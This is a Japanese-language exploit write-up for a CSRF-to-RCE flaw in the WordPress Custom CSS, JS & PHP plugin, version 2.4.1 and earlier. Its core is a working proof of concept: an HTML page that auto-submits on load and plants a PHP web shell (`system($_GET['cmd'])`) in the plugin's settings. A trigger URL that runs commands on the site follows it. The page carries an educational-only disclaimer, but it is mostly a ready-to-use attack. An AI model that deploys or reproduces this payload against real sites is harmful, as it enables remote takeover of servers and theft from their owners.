
WordPress Custom CSS, JS & PHP プラグイン <= 2.4.1 - CSRF to RCE 脆弱性
WPFactory Custom CSS, JS & PHP プラグインのクロスサイトリクエストフォージェリ (CSRF) 脆弱性により、許可されていない POST リクエストを介して悪意のある PHP コードを注入することで、リモートコード実行 (RCE) が可能になります。
これは 2.4.1 までの全バージョンに影響します。
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H以下は、正常に悪用された結果を示すスクリーンショットで、URL パラメータを介してリモートコードがどのように実行されるかを示しています:


<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>WordPress Custom CSS, JS & PHP plugin <= 2.4.1 - CSRF to RCE vulnerability</title>
</head>
<body onload="document.forms[0].submit()">
<h1>CSRF PoC - WordPress Custom CSS, JS & PHP plugin <= 2.4.1</h1>
<p>By : Nxploited | Khaled Alenazi</p>
<form action="http://192.168.100.74:888/wordpress4/wp-admin/tools.php?page=alg-custom-php" method="POST">
<input type="hidden" name="alg_custom_css_php_enabled" value="1">
<input type="hidden" name="alg_custom_css_php_execute" value="plugins_loaded">
<input type="hidden" name="alg_custom_css_php" value="<?php system($_GET['cmd']); ?>">
<input type="hidden" name="alg_ccjp_submit" value="php">
<noscript><input type="submit" value="Submit"></noscript>
</form>
</body>
</html>
plugins_loaded フックを介して、ページが読み込まれるたびにコードが自動的に実行されます。http://target-site.com/?cmd=whoami
この PoC は教育目的のみのものです。
著者は、この情報の不適切な適用によって生じたいかなる誤用や損害についても責任を負いません。
必ず管理された環境で、許可を得た上でテストしてください。
作成者: Nxploited | Khaled Alenazi